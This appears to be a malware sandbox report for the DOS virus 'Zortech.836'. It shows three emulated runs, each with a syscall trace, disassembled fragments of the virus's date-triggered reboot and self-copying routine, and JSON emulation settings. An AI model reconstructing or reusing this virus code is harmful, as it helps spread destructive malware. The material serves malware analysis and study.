Sample viewer

vx.netlux.org/Virus.DOS.Zortech.836

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:10:08.116192998Z	255	PC: 12a6b \| UNKNOWN!
2018-12-17T22:10:08.117906596Z	53	PC: 12a7a \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:10:08.11990013Z	73	PC: 12a91 \| Release memory
2018-12-17T22:10:08.121218042Z	72	PC: 12a98 \| Allocate memory
2018-12-17T22:10:08.123630459Z	74	PC: 12ab0 \| Reallocate memory
2018-12-17T22:10:08.125124743Z	74	PC: 12abe \| Reallocate memory
2018-12-17T22:10:08.126680784Z	37	PC: 12ae1 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:10:08.128139314Z	42	PC: 12af1 \| Get date 0x12af1: cmp dh, 9 0x12af4: jbe 0x12b04 0x12af6: mov ah, 0x2c 0x12af8: int 0x21 0x12afa: cmp dl, 0x60 0x12afd: jbe 0x12b04 0x12aff: ljmp 0xf000:0xfff0 0x12b04: cmp byte ptr cs:[0x119], 0xff 0x12b0a: jne 0x12b0f 0x12b0c: jmp 0x12b40 0x12b0e: nop 0x12b0f: mov ax, cs 0x12b11: add ax, 0x1000 0x12b14: mov es, ax 0x12b16: mov di, 0 0x12b19: mov si, 0x1f6 0x12b1c: mov cx, 0xa 0x12b1f: rep movsb byte ptr es:[di], byte ptr [si] 0x12b21: mov si, word ptr ds:[0x2fe] 0x12b26: add si, 0x100
2018-12-17T22:10:08.130314161Z	44	PC: 12afa \| Get time 0x12afa: cmp dl, 0x60 0x12afd: jbe 0x12b04 0x12aff: ljmp 0xf000:0xfff0 0x12b04: cmp byte ptr cs:[0x119], 0xff 0x12b0a: jne 0x12b0f 0x12b0c: jmp 0x12b40 0x12b0e: nop 0x12b0f: mov ax, cs 0x12b11: add ax, 0x1000 0x12b14: mov es, ax 0x12b16: mov di, 0 0x12b19: mov si, 0x1f6 0x12b1c: mov cx, 0xa 0x12b1f: rep movsb byte ptr es:[di], byte ptr [si] 0x12b21: mov si, word ptr ds:[0x2fe] 0x12b26: add si, 0x100 0x12b2a: mov di, 0x100 0x12b2d: mov cx, 0x344 0x12b30: mov ax, 0 0x12b33: push es

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2253,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:45:20.000372233Z	255	PC: 12a6b \| UNKNOWN!
2018-12-25T11:45:20.001377703Z	53	PC: 12a7a \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:45:20.002586689Z	73	PC: 12a91 \| Release memory
2018-12-25T11:45:20.003683247Z	72	PC: 12a98 \| Allocate memory
2018-12-25T11:45:20.005677933Z	74	PC: 12ab0 \| Reallocate memory
2018-12-25T11:45:20.006672773Z	74	PC: 12abe \| Reallocate memory
2018-12-25T11:45:20.007739033Z	37	PC: 12ae1 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:45:20.008910757Z	42	PC: 12af1 \| Get date 0x12af1: cmp dh, 9 0x12af4: jbe 0x12b04 0x12af6: mov ah, 0x2c 0x12af8: int 0x21 0x12afa: cmp dl, 0x60 0x12afd: jbe 0x12b04 0x12aff: ljmp 0xf000:0xfff0 0x12b04: cmp byte ptr cs:[0x119], 0xff 0x12b0a: jne 0x12b0f 0x12b0c: jmp 0x12b40 0x12b0e: nop 0x12b0f: mov ax, cs 0x12b11: add ax, 0x1000 0x12b14: mov es, ax 0x12b16: mov di, 0 0x12b19: mov si, 0x1f6 0x12b1c: mov cx, 0xa 0x12b1f: rep movsb byte ptr es:[di], byte ptr [si] 0x12b21: mov si, word ptr ds:[0x2fe] 0x12b26: add si, 0x100

{"DateBased":true,"Day":1,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2253,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:45:20.019977444Z	255	PC: 12a6b \| UNKNOWN!
2018-12-25T11:45:20.021443795Z	53	PC: 12a7a \| Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:45:20.022695087Z	73	PC: 12a91 \| Release memory
2018-12-25T11:45:20.023848383Z	72	PC: 12a98 \| Allocate memory
2018-12-25T11:45:20.026702996Z	74	PC: 12ab0 \| Reallocate memory
2018-12-25T11:45:20.028382889Z	74	PC: 12abe \| Reallocate memory
2018-12-25T11:45:20.030289107Z	37	PC: 12ae1 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:45:20.033038536Z	42	PC: 12af1 \| Get date 0x12af1: cmp dh, 9 0x12af4: jbe 0x12b04 0x12af6: mov ah, 0x2c 0x12af8: int 0x21 0x12afa: cmp dl, 0x60 0x12afd: jbe 0x12b04 0x12aff: ljmp 0xf000:0xfff0 0x12b04: cmp byte ptr cs:[0x119], 0xff 0x12b0a: jne 0x12b0f 0x12b0c: jmp 0x12b40 0x12b0e: nop 0x12b0f: mov ax, cs 0x12b11: add ax, 0x1000 0x12b14: mov es, ax 0x12b16: mov di, 0 0x12b19: mov si, 0x1f6 0x12b1c: mov cx, 0xa 0x12b1f: rep movsb byte ptr es:[di], byte ptr [si] 0x12b21: mov si, word ptr ds:[0x2fe] 0x12b26: add si, 0x100